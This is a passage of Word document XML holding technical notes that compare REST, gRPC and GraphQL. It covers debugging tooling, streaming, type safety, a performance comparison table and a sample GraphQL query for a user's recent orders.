    <w:p w14:paraId="6CE83620" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23716B41" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   API responses cached at CDN: REST wins clearly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512C5961" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6DC3FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4. Debugging and operational simplicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6704B45F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   REST: curl, browser devtools, Postman, Insomnia — all work immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A889D31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: need grpcurl, Bloom RPC, or Postman with gRPC support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603443C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D66B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Small team, prototyping, early stage: REST's simplicity wins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28399DA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45619AC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5. Webhook/callback pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7AD9D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   REST: client exposes HTTP endpoint, server POSTs to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200322DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: bidirectional streaming can replace webhooks, but REST webhooks are universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D1608" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Third-party service sends webhook: they'll send HTTP, not gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15230F05" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7D03EBAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Use gRPC when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75939C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2BAC850A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>1. Internal service-to-service communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478A169" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   All services under your control (can standardize on gRPC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D4E546" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Type safety from generated code catches API mismatches at compile time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6CAE1B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Not: "field renamed from user_id to userId" causes silent breakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20602F6E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: protoc won't compile if client uses old field name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25085EE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2DE337" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>2. High-throughput, performance-critical paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74729543" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Binary encoding: 3-8× faster serialization than JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD514D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Smaller payloads: 3-5× smaller than JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D4C5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   HTTP/2 multiplexing: 1 connection handles all RPCs (no connection overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B70737" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C9FBF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   At 100K RPS between services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A94943" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     JSON serialization CPU: ~12% of one core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066C7851" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Protobuf serialization CPU: ~1.4% of one core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A508156" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     Cumulative at scale: meaningful savings in compute costs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E85C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DEEC5A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>3. Streaming requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DEFFE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Real-time data: stock prices, sensor readings, log streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8CBF10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Long-lived connections: order status updates, live dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A8FD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD32CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   REST: requires polling (inefficient) or SSE (server-only streaming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852BA71" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: bidirectional streaming is a first-class primitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C73E1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6E029" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>4. Strict API contracts between teams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F267DF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Multiple teams consuming same API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5887D431" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   Breaking changes must be caught before deployment (not in production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE43124" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E2E02" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   REST: no schema enforcement → field rename causes silent breakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77ED59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: .proto is the source of truth → generated code → compile-time verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D95B60" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E936F61" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>5. Polyglot microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924BF98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   10 services in Go, Python, Java, Rust, Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6FE83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEECEB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   REST: each team writes own HTTP client code → inconsistency, bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C33BD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">   gRPC: protoc generates client for each language from same .proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D9D8E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">         Consistent serialization, error handling, timeout behavior across all languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6266A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="4C0863D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Performance comparison summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA1247" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="46CC2754" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Metric              REST/JSON    gRPC/Protobuf  Winner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D8CF8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>─────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5DC90" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Payload size        ~1.2KB       ~350B          gRPC (71% smaller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504B4B51" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Serialization       ~800 MB/s    ~2500 MB/s     gRPC (3× faster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73953572" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Connections         many         few (mux)      gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E303A25" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Streaming           limited      native         gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B336E4A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Browser support     native       needs gRPC-Web REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1AE658" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Human readability   native       binary         REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603B987" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Debug tooling       excellent    good           REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F137AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code generation     optional     required       REST (simpler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1B432" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Type safety         optional     enforced       gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029AE5F8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Caching             native HTTP  none           REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74FBB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>External APIs       convention   less common    REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8694E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GraphQL — The Third Alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1CA20D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2181BDAE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>GraphQL occupies a different niche from both REST and gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09567C21" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="55E4AF24" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Core value proposition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411FD7E9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Client specifies EXACTLY what data it needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAAEBB2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Server returns exactly that (no more, no less)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2120F4A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Eliminates over-fetching (GET /users returns 30 fields, client needs 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855FD7D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Eliminates under-fetching (need user + orders → 2 REST calls → 1 GraphQL query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA69F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6CEF31F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5CD4C1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  query GetUserWithOrders($userId: ID!) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ACC0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    user(id: $userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1152E3B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F5D664" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E930A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      orders(last: 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACBE93D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF6D5A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2E546" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB25E28" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        items {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D3196C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          product { name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883057F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576BAFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F084A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DE777" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45902E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B90748" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7A593570" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Fetches only name, email from user (not 30 other fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63F330" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Fetches only last 5 orders (not all orders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547548AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Fetches only id, total, status from orders (not all order fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32725005" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → All in ONE request (not: GET /users/123, GET /orders?user_id=123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66749F9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="231C3509" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Transport: HTTP POST (JSON request + response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B5C6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Schema: GraphQL Schema Definition Language (SDL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685D0B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Type system: enforced at runtime (not compile time like Protobuf)</w:t>
      </w:r>
    </w:p>
